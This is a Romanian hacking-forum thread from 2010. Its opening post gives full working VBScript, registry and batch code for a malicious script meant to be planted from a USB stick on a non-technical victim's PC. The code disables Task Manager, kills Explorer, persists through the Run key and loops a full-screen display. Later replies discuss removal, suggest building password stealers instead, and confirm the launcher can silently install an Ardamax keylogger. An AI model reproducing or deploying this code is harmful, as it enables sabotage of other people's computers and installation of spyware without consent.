Alexander33 Posted March 13, 2010 Report Posted March 13, 2010 (edited) Description: Un Script destinat sa distruga...Lucruri de care ai nevoie:1.un creier2.o persoana necunoscatoare in domeniul calculatoarelor3.RABDARE....EDIT:4[in special chestia asta]: WINDOWS XP/NT 2000/98 sau oricare windows care are vbscript alte OS-uri cum ar fi LINUX,MAC etc nu va merge pentru ca poate fi sters...si chiar si in windows cu Safe Mode desi nu este usor daca nu stii sa umblii in Registru[multumesc ptr toti care mi-au spus informatiile astea ]CUm Functioneaza:Trimiti/Pui pe Stick Fisierele de mai jos si le trimiti/le pui in directorul C:\Windows[nota pentru amatori dupa ce le copiati dati properties si Hidden.]si rulati fisierul krima.reg si dati Oksi la urmatorul restart victima va avea o surpriza neplacuta...adica:1.Task Manager nu va Merge...2.Procesul Explorer.exe va fi inchis...3.Arata smecher....[ca la matrix :cool:]4.Nu poti sa scapi de script ca e in Startup...5.Ca sa inchizi scriptul trebuie sa inchizi calculatorul...Deci e Sah Mat...PS: ori formateaza partitia C:\ ori reinstaleaza windows-ul...ori daca ati gasit voi o solutie sa scapati de asta spune-ti-mi si mie si o rezolv in cateva minute/ore/zile Ce e mai Jos le scrieti separat fiecare intr-un notepad si le da-ti File>Save As cu numele Krima dar cu extensia diferitaadica :Krima.vbs ,Krima.regKrima.vbssub Matrixdim variableSet variable=CreateObject("WScript.Shell")Set FSO = CreateObject("Scripting.FileSystemObject")temp=FSO.GetSpecialFolder(2)Set File = FSO.OpenTextFile(temp &"\Matrix.bat", 2, True)With File.WriteLine "@echo off" .WriteLine "@color 0a" .WriteLine ":cmd" .WriteLine "echo HACKOO %random% HACKOO %random% HACKOO %random% HACKOO %random %HACKOO %random% HACKOO %random% %random% HACKOO %random %HACKOO %random% HACKOO %random% HACKOO %random% HACKOO %random% %random% HACKOO %random% %random% HACKOO %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO HACKOO %random% %random% %random% HACKOO %random% HACKOO %random% HACKOO%random% %random% %random% %random% HACKOO %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% HACKOO %random% %random% %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% HACKOO %random% HACKOO %random% %random% HACKOO %random% %random% %random% %random% %random% %random% %random% %random%" .WriteLine "goto:cmd" .CloseEnd Withvariable.regWrite "HKEY_CURRENT_USER\Console\Fullscreen", "1", "REG_DWORD" ' To make the console in the Fullscreenvariable.run "Taskkill /IM Explorer.exe /F", 0 , Truewscript.sleep 2000variable.run temp &"\Matrix.bat"end subSet shell = CreateObject("Wscript.shell")Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"MatrixKrima.regWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]" "="C:\\WINDWOS\\krima.vbs"Am facut si un launcher.bat care copiaza automat fisierul krima.vbs in C:\Windows si fisierul krima trebuie sa fie in acelasi folder cu launcher-ul salvati ca launch.bat[tot in notepad]XCOPY "krima.vbs" "C:\" /D /E /C /R /I /K /Y CREDITS : Me&Hackoo pentru matrix script...@@OFFTOPIC:Nytro sterge-mi postul,mai da-mi ban inca doua saptamani si inca un punct de penalizare ca am facut un tutorial....Si ma intreb cat o sa dureze pana apare si pe alte site-uri cum ar fi INfo-hack[site de leecheri..].... Edited March 14, 2010 by Alexander33 Quote
SympleBoy22 Posted March 13, 2010 Report Posted March 13, 2010 Daca era un stealer era mai inteligent. Quote
Alexander33 Posted March 13, 2010 Author Report Posted March 13, 2010 Daca era un stealer era mai inteligent.abea am inceput sa invat si eu... stealer fiind un fel de keylogger/trojan collector corect? Quote
begood Posted March 13, 2010 Report Posted March 13, 2010 din safe mode nu merge sa stergi ?windows live cdfaci unu cu programul asta, apoi poti intra de pe livecd si poti sterge toate fisierele manual.poti folosi si Ultimate Boot CD - Overview ca mediu live.slax cred ca nu poate interactiona cu ntfs (nu poate sterge dar poate citi)backtrack ? (raspundeti voi aici, nu stiu daca are suport write ntfs) Quote
SympleBoy22 Posted March 13, 2010 Report Posted March 13, 2010 Da,era mai inteligent daca puneai un fel de keylogger care facea toate acele lucruri inafara de chestia cu Matrix Screen si Reinstalatul windowsului. Quote
vizitatoru123 Posted March 13, 2010 Report Posted March 13, 2010 Hmmmm ia sa vedem ... ce zici de un live cd linux sa il stergi ? gen Knoppix sau altul.Nu vreau sa ma intelegi gresit, e ok "virusul" e ok ca iti dai silinta si inveti, dar nu cred ca asta este scopul unui adevarat virus, sa distruga. In general toti urmaresc sa aiba acces la un PC sau sa fure date fara ca userul sa aiba habar. Quote
tdxev Posted March 13, 2010 Report Posted March 13, 2010 Poate chiar banalul : "restore to last known good configuration" Quote
zippy Posted March 13, 2010 Report Posted March 13, 2010 abea am inceput sa invat si eu... stealer fiind un fel de keylogger/trojan collector corect?Un stealer in vb6 sau .NET nu mi se pare o idee buna dar daca vrei sa incerci cauta unde se salveaza parolele in diferite programe , browsere etc. (Mozilla , Ie , Yahoo Messenger , Steam , etc.) Quote
Scorpionadi Posted March 14, 2010 Report Posted March 14, 2010 Daca facem acel launch.bat si in loc de fisierul krima punem virusul(serverul) de la Ardamax , credeti ca l-ar putea instala automat de pe stick?Astept un raspuns va rog , ca m-ar interesa foarte mult Quote
Alexander33 Posted March 14, 2010 Author Report Posted March 14, 2010 din safe mode nu merge sa stergi ?windows live cdfaci unu cu programul asta, apoi poti intra de pe livecd si poti sterge toate fisierele manual.poti folosi si Ultimate Boot CD - Overview ca mediu live.slax cred ca nu poate interactiona cu ntfs (nu poate sterge dar poate citi)backtrack ? (raspundeti voi aici, nu stiu daca are suport write ntfs)da am cam uitat de Safe Mode si am zis sa va alegeti o tinta necunoscatoare Daca facem acel launch.bat si in loc de fisierul krima punem virusul(serverul) de la Ardamax , credeti ca l-ar putea instala automat de pe stick?Astept un raspuns va rog , ca m-ar interesa foarte multda merge, am incercat eu o sa fac un TuT cum sa faci asta mai incolo 1 Quote
Scorpionadi Posted March 14, 2010 Report Posted March 14, 2010 Multumesc pentru raspuns si astept tutorialul Quote
tataye Posted March 14, 2010 Report Posted March 14, 2010 CREDITS : Me...Esti sigur ca e facut de tine ????Matrix Effect in Vbscript - Remote Administration Tool Research forum==================================================Google================================================== Quote
Alexander33 Posted March 14, 2010 Author Report Posted March 14, 2010 (edited) Esti sigur ca e facut de tine ????Matrix Effect in Vbscript - Remote Administration Tool Research forum==================================================Google==================================================scz am uitat de cine era facut Matrix-ul si am editat si l-am pus si pe HACKOO@@Begood si daca intri in Safe Mode atunci ce mai faci? daca victima nu stie unde e pus scriptul si mi se pare ca nu poti sa deschizi msconfig .... last solution regedit si cauti pana ti se face rau nu? Edited March 15, 2010 by Alexander33 Quote
